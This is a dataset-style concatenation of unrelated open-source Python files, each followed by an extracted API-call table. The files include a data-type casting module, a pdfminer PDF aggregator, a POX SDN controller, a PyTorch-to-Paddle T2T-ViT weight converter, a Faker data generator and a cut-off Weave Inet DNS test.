return _primitive_str_to_type_table[data_type_str]
except KeyError:
try:
return _primitive_alias_str_to_type_table[data_type_str]
except KeyError:
try:
return vector.get_from_string(data_type_str)
except:
raise ValueError("Unsupported type string '%s' " % data_type_str)
@staticmethod
def is_primitive_type(data_type):
return data_type in _primitive_type_to_str_table or data_type in _primitive_alias_type_to_type_table
@staticmethod
def is_complex_type(data_type):
try:
return data_type.is_complex_type
except AttributeError:
return False
@staticmethod
def is_primitive_alias_type(data_type):
return data_type in _primitive_alias_type_to_type_table
@staticmethod
def get_from_type(data_type):
"""
Returns the data type for the given type (often it will return the same type)
Parameters
----------
data_type : type
valid data type or type that may be aliased for a valid data type;
if invalid, a ValueError is raised
Returns
-------
result : type
valid data type for given type
Examples
--------
>>> valid_data_types.get_from_type(int)
numpy.int32
"""
if _DataTypes.is_primitive_alias_type(data_type):
return _primitive_alias_type_to_type_table[data_type]
if _DataTypes.is_primitive_type(data_type) or _DataTypes.is_complex_type(data_type):
return data_type
raise ValueError("Unsupported type %s" % data_type)
@staticmethod
def validate(data_type):
"""Raises a ValueError if data_type is not a valid data_type"""
_DataTypes.get_from_type(data_type)
@staticmethod
def get_constructor(to_type):
"""gets the constructor for the to_type"""
try:
return to_type.constructor
except AttributeError:
if to_type == float64 or to_type == float32:
return get_float_constructor(to_type)
if to_type == datetime:
return datetime_constructor
def constructor(value):
if value is None:
return None
return to_type(value)
return constructor
@staticmethod
def standardize_schema(schema):
return [(name, _DataTypes.get_from_type(t)) for name, t in schema]
@staticmethod
def validate_data(schema, data):
return [_DataTypes.cast(value, data_type) for value, data_type in zip(data, map(lambda t: t[1], schema))]
@staticmethod
def get_default_data_for_schema(schema):
return [_DataTypes.get_default_type_value(data_type) for name, data_type in schema]
@staticmethod
def get_default_type_value(data_type):
try:
return _primitive_type_to_default_value[data_type]
except KeyError:
if data_type == vector:
return []
if data_type == datetime:
return datetime.now()
raise ValueError("Unable to find default value for data type %s (invalid data type)" % data_type)
@staticmethod
def cast(value, to_type):
"""
Returns the given value cast to the given type. None is always returned as None
Parameters
----------
value : object
value to convert by casting
to_type : type
valid data type to use for the cast
Returns
-------
results : object
the value cast to the to_type
Examples
--------
>>> valid_data_types.cast(3, float64)
3.0
>>> valid_data_types.cast(4.5, str)
'4.5'
>>> valid_data_types.cast(None, str)
None
>>> valid_data_types.cast(np.inf, float32)
None
"""
if _DataTypes.value_is_missing_value(value): # Special handling for missing values
return None
elif _DataTypes.is_primitive_type(to_type) and type(value) is to_type: # Optimization
return value
try:
constructor = _DataTypes.get_constructor(to_type)
result = constructor(value)
return None if _DataTypes.value_is_missing_value(result) else result
except Exception as e:
raise ValueError(("Unable to cast to type %s\n" % to_type) + str(e))
@staticmethod
def datetime_from_iso(iso_string):
"""create datetime object from ISO 8601 string"""
return datetime_parser.parse(iso_string)
valid_data_types = _DataTypes()
def numpy_to_bson_friendly(obj):
"""take an object and convert it to a type that can be serialized to bson if neccessary."""
if isinstance(obj, float32) or isinstance(obj, float64):
return float(obj)
if isinstance(obj, int32):
return int(obj)
if isinstance(obj, vector.base_type):
return obj.tolist()
if isinstance(obj, datetime):
return obj.isoformat()
if isinstance(obj, dict):
return dict([(numpy_to_bson_friendly(key), numpy_to_bson_friendly(value)) for key, value in obj.items()])
if isinstance(obj, list):
return [numpy_to_bson_friendly(item) for item in obj]
# Let the base class default method raise the TypeError
return obj
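# Illustrative sketch (values assumed): numpy_to_bson_friendly recursively
# converts numpy scalars, numpy arrays, and datetimes into plain Python types, e.g.
#     numpy_to_bson_friendly({"score": float32(1.5), "when": datetime(2015, 4, 1)})
#     # -> {"score": 1.5, "when": "2015-04-01T00:00:00"}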
| [((48, 17, 48, 49), 're.compile', 're.compile', ({(48, 28, 48, 48): '"""^vector\\\\((\\\\d+)\\\\)$"""'}, {}), "('^vector\\\\((\\\\d+)\\\\)$')", False, 'import re\n'), ((168, 15, 168, 43), 'dateutil.parser.parse', 'datetime_parser.parse', ({(168, 37, 168, 42): 'value'}, {}), '(value)', True, 'import dateutil.parser as datetime_parser\n'), ((394, 15, 394, 48), 'dateutil.parser.parse', 'datetime_parser.parse', ({(394, 37, 394, 47): 'iso_string'}, {}), '(iso_string)', True, 'import dateutil.parser as datetime_parser\n'), ((78, 20, 78, 40), 'numpy.atleast_1d', 'np.atleast_1d', ({(78, 34, 78, 39): 'array'}, {}), '(array)', True, 'import numpy as np\n'), ((159, 11, 159, 27), 'numpy.isnan', 'np.isnan', ({(159, 20, 159, 26): 'result'}, {}), '(result)', True, 'import numpy as np\n'), ((171, 19, 171, 35), 'datetime.datetime', 'datetime', ({(171, 28, 171, 34): '*value'}, {}), '(*value)', False, 'from datetime import datetime\n'), ((66, 24, 66, 57), 'numpy.array', 'np.array', (), '', True, 'import numpy as np\n'), ((199, 79, 199, 94), 'numpy.isnan', 'np.isnan', ({(199, 88, 199, 93): 'value'}, {}), '(value)', True, 'import numpy as np\n'), ((347, 23, 347, 37), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n'), ((74, 28, 74, 61), 'numpy.array', 'np.array', (), '', True, 'import numpy as np\n'), ((71, 32, 71, 49), 'json.loads', 'json.loads', ({(71, 43, 71, 48): 'value'}, {}), '(value)', False, 'import json\n')] |
poikilos/tabletopManualMiner | srd/pageaggregator.py | 94a824feabdf0a8efa1bf28670af44820aff9923 | #!/usr/bin/env python3
import math
try:
# from PDFPageDetailedAggregator:
from pdfminer.pdfdocument import PDFDocument, PDFNoOutlines
from pdfminer.pdfparser import PDFParser
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import PDFPageAggregator
from pdfminer.layout import LTPage, LTChar, LTAnno, LAParams, LTTextBox, LTTextLine
except ModuleNotFoundError:
    # prerr() is not defined or imported in this file, so report the missing
    # dependency on stderr directly.
    import sys
    print("To use the aggregator (required for generating chunks.json)"
          " you must first install the following module for Python:",
          file=sys.stderr)
    print("  pdfminer", file=sys.stderr)
    sys.exit(1)
try:
input = raw_input
except NameError:
# Python 3
pass
# TODO:
from srd import (
objDict,
BBox,
DocChunk,
clean_frag_text,
clean_frag,
same_style,
frag_dict,
)
def ltannoDict(ltanno):
return objDict(ltanno)
'''
class DocFragment:
def __init__(self, text, fontname, size):
self.text = text
self.fontname = fontname
self.size = size
def sameStyle(self, fragment):
"""
Is same fontname and size.
"""
ffn = fragment.fontname
ffs = fragment.size
return (ffs == self.size) and (ffn == self.fontname)
def clean(self):
self.text = clean_frag_text(self.text)
'''
class PDFPageDetailedAggregator(PDFPageAggregator):
"""
This class is based on PDFPageDetailedAggregator from
lindblandro's Oct 4 '13 at 10:33 answer
edited by slushy Feb 4 '14 at 23:41
at <https://stackoverflow.com/a/19179114>
on <https://stackoverflow.com/questions/15737806/extract-text-using-
pdfminer-and-pypdf2-merges-columns>.
"""
def __init__(self, rsrcmgr, pageno=1, laparams=None,
colStarts=None):
PDFPageAggregator.__init__(self, rsrcmgr, pageno=pageno, laparams=laparams)
self.chunks = []
self.colStarts = colStarts
if self.colStarts is not None:
print("columns: {}".format(len(self.colStarts)))
self.page_number = 0
def receive_layout(self, ltpage):
def render(item, page_number):
if isinstance(item, LTPage) or isinstance(item, LTTextBox):
for child in item:
render(child, page_number)
elif isinstance(item, LTTextLine):
child_str = ''
fontSize = None
fontName = None
fontSizes = []
fontNames = []
warnings = []
parts = []
fragments = []
annotations = []
for child in item:
strp = None
if isinstance(child, LTChar):
child_str += child.get_text()
strp = child.get_text().strip()
# and (len(strp) > 0)
if fontName is not None:
if fontName != child.fontname:
warnings.append("mixed fontName")
if fontSize is not None:
if fontSize != child.size:
warnings.append("mixed fontSize")
fontName = child.fontname
fontSize = child.size
frag = frag_dict(
child.get_text(),
child.fontname,
child.size,
)
fragments.append(frag)
# fontNames.append(fontName)
# fontSizes.append(fontSize)
parts.append(strp)
elif isinstance(child, LTAnno):
child_str += child.get_text()
strp = child.get_text().strip()
annotations.append(ltannoDict(child))
child_str = ' '.join(child_str.split()).strip()
if child_str:
if len(warnings) > 0:
"""
print("Warnings in \"{}\":"
" {}: fonts {} sizes {} parts {}"
"".format(child_str, warnings, fontNames,
fontSizes, parts))
input("Press enter to continue...")
"""
fontSize = None
fontName = None
col = None
cols = 0
if self.colStarts is not None:
cols = len(self.colStarts)
                    if (cols == 0) or (cols == 1):  # no colStarts given, or a single column
col = 0
elif (cols == 2):
col = 0
col2Min = math.floor(self.colStarts[1])
if item.bbox[0] >= col2Min:
col = 1 # Index [1] is column 2.
else:
raise ValueError("Only a list of length 1 (same as None) or 2"
" is implemented for \"colStarts\".")
# if isinstance(child, LTChar):
'''
try:
fontName = child.fontname
fontSize = child.size
# Avoid "AttributeError:
# 'LTAnno' object has no attribute 'fontname'"
except AttributeError as ex:
print("dir(LTTextLine): {}".format(dir(LTTextLine)))
print("dir(child): {}".format(dir(child)))
raise ex
'''
chunk = DocChunk(
page_number,
col,
item.bbox,
child_str,
fontName=fontName,
fontSize=fontSize,
fragments=fragments,
annotations=annotations,
)
chunk.groupFragments()
self.chunks.append(chunk)
for child in item:
render(child, page_number)
return
render(ltpage, self.page_number)
self.page_number += 1
self.chunks = sorted(self.chunks, key = lambda f: (f.pageid, f.column, -f.bbox.y1))
self.result = ltpage
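# Illustrative driver sketch (not part of the original file; the file name and
# column offsets are assumed): the aggregator plugs into the standard pdfminer
# pipeline, e.g.
#     from pdfminer.pdfpage import PDFPage
#     rsrcmgr = PDFResourceManager()
#     device = PDFPageDetailedAggregator(rsrcmgr, laparams=LAParams(),
#                                        colStarts=[0, 306])
#     interpreter = PDFPageInterpreter(rsrcmgr, device)
#     with open("manual.pdf", "rb") as stream:
#         for page in PDFPage.get_pages(stream):
#             interpreter.process_page(page)
#     chunks = device.chunks  # DocChunk objects sorted by (page, column, -y1)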
| [((37, 11, 37, 26), 'srd.objDict', 'objDict', ({(37, 19, 37, 25): 'ltanno'}, {}), '(ltanno)', False, 'from srd import objDict, BBox, DocChunk, clean_frag_text, clean_frag, same_style, frag_dict\n'), ((72, 8, 72, 83), 'pdfminer.converter.PDFPageAggregator.__init__', 'PDFPageAggregator.__init__', (), '', False, 'from pdfminer.converter import PDFPageAggregator\n'), ((162, 28, 171, 21), 'srd.DocChunk', 'DocChunk', (), '', False, 'from srd import objDict, BBox, DocChunk, clean_frag_text, clean_frag, same_style, frag_dict\n'), ((143, 34, 143, 63), 'math.floor', 'math.floor', ({(143, 45, 143, 62): 'self.colStarts[1]'}, {}), '(self.colStarts[1])', False, 'import math\n')] |
dkim286/cpsc454-proj | ctrltest.py | 16314802bae3cfbd4d1bf6d7f75a9e6adeb6700d | from pox.core import core
import pox.openflow.libopenflow_01 as of
from forwarding.l2_learning import *
from tkinter import *
from project.firewall import TestFW
from project.ui import UI
def setup():
top = Toplevel()
# quit POX when window is killed
top.protocol("WM_DELETE_WINDOW", core.quit)
top.title("firewall thing")
    # tkinter.Frame has no "padding" option (that is a ttk.Frame option)
    frame = Frame(top, padx=3, pady=3)
    frame.grid()
    disp = Label(frame, text="hmm")  # keep the widget itself; grid() returns None
    disp.grid(column=0, row=0)
def reload():
conn = core.openflow.getConnection(1)
disp.configure(str(dir(conn)))
b_reload = Button(frame, text="reload", command=reload).grid(column=0, row=1)
b_quit = Button(frame, text="quit", command=top.destroy).grid(column=0, row=2)
def launch():
fw_list_dpid = [51, 52]
srv_list = {"web" : ['10.0.0.100']}
# register firewall
core.registerNew(TestFW, fw_list_dpid[0], srv_list)
# just use L2 learning switch for others
core.registerNew(l2_learning, False)
#core.registerNew(UI)
def start_ui():
core.tk.do(setup)
core.call_when_ready(start_ui, ['openflow', 'tk'])
| [((36, 4, 36, 55), 'pox.core.core.registerNew', 'core.registerNew', ({(36, 21, 36, 27): 'TestFW', (36, 29, 36, 44): 'fw_list_dpid[0]', (36, 46, 36, 54): 'srv_list'}, {}), '(TestFW, fw_list_dpid[0], srv_list)', False, 'from pox.core import core\n'), ((39, 4, 39, 40), 'pox.core.core.registerNew', 'core.registerNew', ({(39, 21, 39, 32): 'l2_learning', (39, 34, 39, 39): '(False)'}, {}), '(l2_learning, False)', False, 'from pox.core import core\n'), ((47, 4, 47, 54), 'pox.core.core.call_when_ready', 'core.call_when_ready', ({(47, 25, 47, 33): 'start_ui', (47, 35, 47, 53): "['openflow', 'tk']"}, {}), "(start_ui, ['openflow', 'tk'])", False, 'from pox.core import core\n'), ((24, 15, 24, 45), 'pox.core.core.openflow.getConnection', 'core.openflow.getConnection', ({(24, 43, 24, 44): '1'}, {}), '(1)', False, 'from pox.core import core\n'), ((45, 8, 45, 25), 'pox.core.core.tk.do', 'core.tk.do', ({(45, 19, 45, 24): 'setup'}, {}), '(setup)', False, 'from pox.core import core\n')] |
kenmutuma001/Blog | virtual/lib/python3.6/site-packages/mako/__init__.py | 6b19a77b71694bbe9f5e84207de46c68f87ebc5e | # mako/__init__.py
# Copyright (C) 2006-2016 the Mako authors and contributors <see AUTHORS file>
#
# This module is part of Mako and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
__version__ = '1.0.9'
| [] |
RangeKing/PaddleViT | image_classification/T2T_ViT/load_pytorch_weights.py | 0e25958686e04ed8872cf67fba0dfd6918e9b4dd | # Copyright (c) 2021 PPViT Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""convert pytorch model weights to paddle pdparams"""
import os
import numpy as np
import paddle
import torch
import timm
from config import get_config
from t2t_vit import build_t2t_vit as build_model
from T2T_ViT_torch.models.t2t_vit import *
from T2T_ViT_torch.utils import load_for_transfer_learning
def print_model_named_params(model):
print('----------------------------------')
for name, param in model.named_parameters():
print(name, param.shape)
print('----------------------------------')
def print_model_named_buffers(model):
print('----------------------------------')
for name, param in model.named_buffers():
print(name, param.shape)
print('----------------------------------')
def torch_to_paddle_mapping(model_name, config):
# (torch_param_name, paddle_param_name)
mapping = [
('cls_token', 'cls_token'),
('pos_embed', 'pos_embed'),
]
for idx in range(1, 3):
th_prefix = f'tokens_to_token.attention{idx}'
pp_prefix = f'patch_embed.attn{idx}'
if '_t_' in model_name:
layer_mapping = [
(f'{th_prefix}.attn.qkv', f'{pp_prefix}.attn.qkv'),
(f'{th_prefix}.attn.proj', f'{pp_prefix}.attn.proj'),
(f'{th_prefix}.norm1', f'{pp_prefix}.norm1'),
(f'{th_prefix}.norm2', f'{pp_prefix}.norm2'),
(f'{th_prefix}.mlp.fc1', f'{pp_prefix}.mlp.fc1'),
(f'{th_prefix}.mlp.fc2', f'{pp_prefix}.mlp.fc2'),
]
else:
layer_mapping = [
(f'{th_prefix}.w', f'{pp_prefix}.w'),
(f'{th_prefix}.kqv', f'{pp_prefix}.kqv'),
(f'{th_prefix}.proj', f'{pp_prefix}.proj'),
(f'{th_prefix}.norm1', f'{pp_prefix}.norm1'),
(f'{th_prefix}.norm2', f'{pp_prefix}.norm2'),
(f'{th_prefix}.mlp.0', f'{pp_prefix}.mlp.0'),
(f'{th_prefix}.mlp.2', f'{pp_prefix}.mlp.2'),
]
mapping.extend(layer_mapping)
mapping.append(('tokens_to_token.project','patch_embed.proj'))
num_layers = config.MODEL.DEPTH
for idx in range(num_layers):
th_prefix = f'blocks.{idx}'
pp_prefix = f'blocks.{idx}'
layer_mapping = [
(f'{th_prefix}.norm1', f'{pp_prefix}.norm1'),
(f'{th_prefix}.attn.qkv', f'{pp_prefix}.attn.qkv'),
(f'{th_prefix}.attn.proj', f'{pp_prefix}.attn.proj'),
(f'{th_prefix}.norm2', f'{pp_prefix}.norm2'),
(f'{th_prefix}.mlp.fc1', f'{pp_prefix}.mlp.fc1'),
(f'{th_prefix}.mlp.fc2', f'{pp_prefix}.mlp.fc2'),
]
mapping.extend(layer_mapping)
head_mapping = [
('norm', 'norm'),
('head', 'head'),
]
mapping.extend(head_mapping)
return mapping
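# For reference (names assumed): each entry pairs a torch parameter prefix with
# its paddle counterpart, e.g. ('blocks.0.attn.qkv', 'blocks.0.attn.qkv');
# _set_value() below appends .weight/.bias (or ._mean/._variance) as needed.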
def convert(torch_model, paddle_model, model_name, config):
def _set_value(th_name, pd_name, transpose=True):
th_shape = th_params[th_name].shape
pd_shape = tuple(pd_params[pd_name].shape) # paddle shape default type is list
#assert th_shape == pd_shape, f'{th_shape} != {pd_shape}'
print(f'**SET** {th_name} {th_shape} **TO** {pd_name} {pd_shape}')
if isinstance(th_params[th_name], torch.nn.parameter.Parameter):
value = th_params[th_name].data.numpy()
else:
value = th_params[th_name].numpy()
if len(value.shape) == 2 and transpose:
value = value.transpose((1, 0))
pd_params[pd_name].set_value(value)
# 1. get paddle and torch model parameters
pd_params = {}
th_params = {}
for name, param in paddle_model.named_parameters():
pd_params[name] = param
for name, param in torch_model.named_parameters():
th_params[name] = param
for name, param in paddle_model.named_buffers():
pd_params[name] = param
for name, param in torch_model.named_buffers():
th_params[name] = param
# 2. get name mapping pairs
mapping = torch_to_paddle_mapping(model_name, config)
missing_keys_th = []
missing_keys_pd = []
zip_map = list(zip(*mapping))
th_keys = list(zip_map[0])
pd_keys = list(zip_map[1])
for key in th_params:
missing = False
if key not in th_keys:
missing = True
if key.endswith('.weight'):
if key[:-7] in th_keys:
missing = False
if key.endswith('.bias'):
if key[:-5] in th_keys:
missing = False
if missing:
missing_keys_th.append(key)
for key in pd_params:
missing = False
if key not in pd_keys:
missing = True
if key.endswith('.weight'):
if key[:-7] in pd_keys:
missing = False
if key.endswith('.bias'):
if key[:-5] in pd_keys:
missing = False
if missing:
missing_keys_pd.append(key)
print('====================================')
print('missing_keys_pytorch:')
print(missing_keys_th)
print('missing_keys_paddle:')
print(missing_keys_pd)
print('====================================')
# 3. set torch param values to paddle params: may needs transpose on weights
for th_name, pd_name in mapping:
if th_name in th_params and pd_name in pd_params: # nn.Parameters
if th_name.endswith('w'):
_set_value(th_name, pd_name, transpose=False)
else:
_set_value(th_name, pd_name)
else:
if f'{th_name}.weight' in th_params and f'{pd_name}.weight' in pd_params:
th_name_w = f'{th_name}.weight'
pd_name_w = f'{pd_name}.weight'
_set_value(th_name_w, pd_name_w)
if f'{th_name}.bias' in th_params and f'{pd_name}.bias' in pd_params:
th_name_b = f'{th_name}.bias'
pd_name_b = f'{pd_name}.bias'
_set_value(th_name_b, pd_name_b)
if f'{th_name}.running_mean' in th_params and f'{pd_name}._mean' in pd_params:
th_name_b = f'{th_name}.running_mean'
pd_name_b = f'{pd_name}._mean'
_set_value(th_name_b, pd_name_b)
if f'{th_name}.running_var' in th_params and f'{pd_name}._variance' in pd_params:
th_name_b = f'{th_name}.running_var'
pd_name_b = f'{pd_name}._variance'
_set_value(th_name_b, pd_name_b)
return paddle_model
def main():
paddle.set_device('cpu')
model_name_list = ['t2t_vit_7',
't2t_vit_10',
't2t_vit_12',
't2t_vit_14',
't2t_vit_14_384',
't2t_vit_19',
't2t_vit_24',
't2t_vit_24_token_labeling',
't2t_vit_t_14',
't2t_vit_t_19',
't2t_vit_t_24']
pth_model_path_list = ['./T2T_ViT_torch/t2t-vit-pth-models/71.7_T2T_ViT_7.pth.tar',
'./T2T_ViT_torch/t2t-vit-pth-models/75.2_T2T_ViT_10.pth.tar',
'./T2T_ViT_torch/t2t-vit-pth-models/76.5_T2T_ViT_12.pth.tar',
'./T2T_ViT_torch/t2t-vit-pth-models/81.5_T2T_ViT_14.pth.tar',
'./T2T_ViT_torch/t2t-vit-pth-models/83.3_T2T_ViT_14.pth.tar',
'./T2T_ViT_torch/t2t-vit-pth-models/81.9_T2T_ViT_19.pth.tar',
'./T2T_ViT_torch/t2t-vit-pth-models/82.3_T2T_ViT_24.pth.tar',
'./T2T_ViT_torch/t2t-vit-pth-models/84.2_T2T_ViT_24.pth.tar',
'./T2T_ViT_torch/t2t-vit-pth-models/81.7_T2T_ViTt_14.pth.tar',
'./T2T_ViT_torch/t2t-vit-pth-models/82.4_T2T_ViTt_19.pth.tar',
'./T2T_ViT_torch/t2t-vit-pth-models/82.6_T2T_ViTt_24.pth.tar']
for model_name, pth_model_path in zip(model_name_list, pth_model_path_list):
print(f'============= NOW: {model_name} =============')
sz = 384 if '384' in model_name else 224
if 'token_labeling' in model_name:
config = get_config(f'./configs/{model_name[:-15]}.yaml')
else:
config = get_config(f'./configs/{model_name}.yaml')
paddle_model = build_model(config)
paddle_model.eval()
print_model_named_params(paddle_model)
print_model_named_buffers(paddle_model)
print('+++++++++++++++++++++++++++++++++++')
device = torch.device('cpu')
if 'token_labeling' in model_name:
torch_model = eval(f'{model_name[:-15]}(img_size={sz})')
else:
if '384' in model_name:
torch_model = eval(f'{model_name[:-4]}(img_size={sz})')
else:
torch_model = eval(f'{model_name}(img_size={sz})')
load_for_transfer_learning(torch_model,
pth_model_path,
use_ema=True,
strict=False,
num_classes=1000)
torch_model = torch_model.to(device)
torch_model.eval()
print_model_named_params(torch_model)
print_model_named_buffers(torch_model)
# convert weights
paddle_model = convert(torch_model, paddle_model, model_name, config)
# check correctness
x = np.random.randn(2, 3, sz, sz).astype('float32')
x_paddle = paddle.to_tensor(x)
x_torch = torch.Tensor(x).to(device)
out_torch = torch_model(x_torch)
out_paddle = paddle_model(x_paddle)
out_torch = out_torch.data.cpu().numpy()
out_paddle = out_paddle.cpu().numpy()
print(out_torch.shape, out_paddle.shape)
print(out_torch[0, 0:100])
print('========================================================')
print(out_paddle[0, 0:100])
assert np.allclose(out_torch, out_paddle, atol = 1e-2)
# save weights for paddle model
model_path = os.path.join(f'./{model_name}.pdparams')
paddle.save(paddle_model.state_dict(), model_path)
print(f'{model_name} done')
print('all done')
if __name__ == "__main__":
main()
| [((198, 4, 198, 28), 'paddle.set_device', 'paddle.set_device', ({(198, 22, 198, 27): '"""cpu"""'}, {}), "('cpu')", False, 'import paddle\n'), ((230, 23, 230, 42), 't2t_vit.build_t2t_vit', 'build_model', ({(230, 35, 230, 41): 'config'}, {}), '(config)', True, 'from t2t_vit import build_t2t_vit as build_model\n'), ((237, 17, 237, 36), 'torch.device', 'torch.device', ({(237, 30, 237, 35): '"""cpu"""'}, {}), "('cpu')", False, 'import torch\n'), ((246, 8, 250, 52), 'T2T_ViT_torch.utils.load_for_transfer_learning', 'load_for_transfer_learning', (), '', False, 'from T2T_ViT_torch.utils import load_for_transfer_learning\n'), ((261, 19, 261, 38), 'paddle.to_tensor', 'paddle.to_tensor', ({(261, 36, 261, 37): 'x'}, {}), '(x)', False, 'import paddle\n'), ((274, 15, 274, 62), 'numpy.allclose', 'np.allclose', (), '', True, 'import numpy as np\n'), ((277, 21, 277, 61), 'os.path.join', 'os.path.join', ({(277, 34, 277, 60): 'f"""./{model_name}.pdparams"""'}, {}), "(f'./{model_name}.pdparams')", False, 'import os\n'), ((227, 21, 227, 69), 'config.get_config', 'get_config', ({(227, 32, 227, 68): 'f"""./configs/{model_name[:-15]}.yaml"""'}, {}), "(f'./configs/{model_name[:-15]}.yaml')", False, 'from config import get_config\n'), ((229, 21, 229, 63), 'config.get_config', 'get_config', ({(229, 32, 229, 62): 'f"""./configs/{model_name}.yaml"""'}, {}), "(f'./configs/{model_name}.yaml')", False, 'from config import get_config\n'), ((260, 12, 260, 41), 'numpy.random.randn', 'np.random.randn', ({(260, 28, 260, 29): '2', (260, 31, 260, 32): '3', (260, 34, 260, 36): 'sz', (260, 38, 260, 40): 'sz'}, {}), '(2, 3, sz, sz)', True, 'import numpy as np\n'), ((262, 18, 262, 33), 'torch.Tensor', 'torch.Tensor', ({(262, 31, 262, 32): 'x'}, {}), '(x)', False, 'import torch\n')] |
j-bac/id-concentration | estimators/__init__.py | 372bacc846d3d5dd5f99178863fa214fb8d3b292 | from ._FisherS import randsphere, preprocessing, SeparabilityAnalysis, point_inseparability_to_pointID
from ._call_estimators import TwoNN, run_singleGMST,run_singleCorrDim,runDANCo, runDANCoStats, runDANColoop,runANOVAglobal,runANOVAlocal,radovanovic_estimators_matlab,Hidalgo
from ._DANCo import dancoDimEst as danco_py
from ._TwoNN import twonn as twonn_py
from ._ESS import essLocalDimEst as ess_py
from ._mada import mada as mada_py
from ._corint import corint as corint_py
| [] |
NeroAsmarr/fz-api | examples/get_message.py | d688277b4c616e93c809381ab082cba834964681 | # 获取调课、改课通知例子
from zfnew import GetInfo, Login
base_url = '学校教务系统的主页url'
lgn = Login(base_url=base_url)
lgn.login('账号', '密码')
cookies = lgn.cookies # cookies获取方法
person = GetInfo(base_url=base_url, cookies=cookies)
message = person.get_message()
print(message)
| [((7, 6, 7, 30), 'zfnew.Login', 'Login', (), '', False, 'from zfnew import GetInfo, Login\n'), ((10, 9, 10, 52), 'zfnew.GetInfo', 'GetInfo', (), '', False, 'from zfnew import GetInfo, Login\n')] |
AtilioA/Sort-merge-join | input/gera_entradas.py | 6ed3199aada921973833cafffc8cbde5062b76fb | import sys
import random
from faker import Faker
def gera(nLinhas=100, nCampos=None):
with open(f"{path}/file{nLinhas}-{nCampos}_python.txt", "w+", encoding="utf8") as file:
if not nCampos:
nCampos = random.randint(2, 10)
camposFuncs = [
fake.name,
fake.date,
fake.ssn,
fake.ascii_email,
fake.job,
fake.phone_number,
fake.coordinate,
fake.license_plate,
fake.credit_card_expire,
][:nCampos]
for _ in range(nLinhas):
file.write(f"{random.randint(0, 999999)},")
for funcao in camposFuncs[:-1]:
file.write(f"{funcao()},")
file.write(camposFuncs[-1]())
file.write("\n")
if __name__ == "__main__":
fake = Faker("pt_BR")
path = "python/"
try:
nLinhas = int(sys.argv[1])
nCampos = int(sys.argv[2])
except:
nLinhas = 1000
nCampos = 10
gera(nLinhas, nCampos)
| [((32, 11, 32, 25), 'faker.Faker', 'Faker', ({(32, 17, 32, 24): '"""pt_BR"""'}, {}), "('pt_BR')", False, 'from faker import Faker\n'), ((9, 22, 9, 43), 'random.randint', 'random.randint', ({(9, 37, 9, 38): '2', (9, 40, 9, 42): '10'}, {}), '(2, 10)', False, 'import random\n'), ((24, 26, 24, 51), 'random.randint', 'random.randint', ({(24, 41, 24, 42): '(0)', (24, 44, 24, 50): '(999999)'}, {}), '(0, 999999)', False, 'import random\n')] |
zainllw0w/skillbox | lessons 20/HomeWork/task9.py | 896287b6f7f5612cf589094131fd1a12b0b192ba | def sort(data, time):
tt = False
ft = True
st = False
is_find = True
winers_name = set()
index = 0
while is_find:
index += 1
for key, values in data.items():
if time[0 - index] == int(values[1]) and ft and values[0] not in winers_name:
first_id = key
ft = False
st = True
winers_name.add(values[0])
first_i = index
elif time[0 -index] == int(values[1]) and st and values[0] not in winers_name:
second_id = key
st = False
tt = True
winers_name.add(values[0])
second_i = index
elif time[0 -index] == int(values[1]) and tt and values[0] not in winers_name:
three_id = key
winers_name.add(values[0])
is_find = False
three_i = index
break
return first_id, second_id, three_id, first_i, second_i, three_i
n = int(input('Введите количество строк: '))
data = dict()
time_list = list()
for i in range(1, n+1):
print(f'Введите {i} строку: ', end='')
text = input().split()
time = text[0]
time_list.append(int(time))
name = text[1]
obj = [name, time]
data[i] = tuple(obj)
f, s, t, fi, si, ti = sort(data, sorted(time_list))
time_list = sorted(time_list)
print('1 место занимает: {0}, с очками {1}'.format(data[f][0], time_list[-fi]))
print('2 место занимает: {0}, с очками {1}'.format(data[s][0], time_list[-si]))
print('3 место занимает: {0}, с очками {1}'.format(data[t][0], time_list[-ti])) | [] |
aiw-google/openweave-core | src/test-apps/happy/test-templates/WeaveInetDNS.py | 5dfb14b21d0898ef95bb62ff564cadfeea4b4702 | #!/usr/bin/env python
#
# Copyright (c) 2016-2017 Nest Labs, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# @file
# Implements WeaveInet class that tests Weave Inet Layer among Weave Nodes.
#
import os
import sys
import time
from happy.ReturnMsg import ReturnMsg
from happy.Utils import *
from happy.HappyNode import HappyNode
from happy.HappyNetwork import HappyNetwork
from WeaveTest import WeaveTest
# Q: what parameters need to be specified?
options = {}
options["quiet"] = False
options["node_id"] = None
options["tap_if"] = None
options["node_ip"] = None
options["ipv4_gateway"] = None
options["dns"] = None
options["use_lwip"] = False
def option():
return options.copy()
class WeaveInetDNS(HappyNode, HappyNetwork, WeaveTest):
def __init__(self, opts = options):
HappyNode.__init__(self)
HappyNetwork.__init__(self)
WeaveTest.__init__(self)
self.quiet = opts["quiet"]
self.node_id = opts["node_id"]
self.tap_if = opts["tap_if"]
self.prefix = opts["prefix"]
self.ipv4_gateway =opts["ipv4_gateway"]
self.dns = opts["dns"]
self.use_lwip = opts["use_lwip"]
self.node_process_tag = "WEAVE-INET-NODE"
def __log_error_and_exit(self, error):
self.logger.error("[localhost] WeaveInetDNS: %s" % (error))
sys.exit(1)
def __checkNodeExists(self, node, description):
if not self._nodeExists(node):
emsg = "The %s '%s' does not exist in the test topology." % (description, node)
self.__log_error_and_exit(emsg)
def __pre_check(self):
# Check if the name of the new node is given
if not self.node_id:
emsg = "Missing name of the virtual node that should start shell."
self.__log_error_and_exit(emsg)
# Check if virtual node exists
if not self._nodeExists():
emsg = "virtual node %s does not exist." % (self.node_id)
self.__log_error_and_exit(emsg)
# check if prefix
if self.prefix == None:
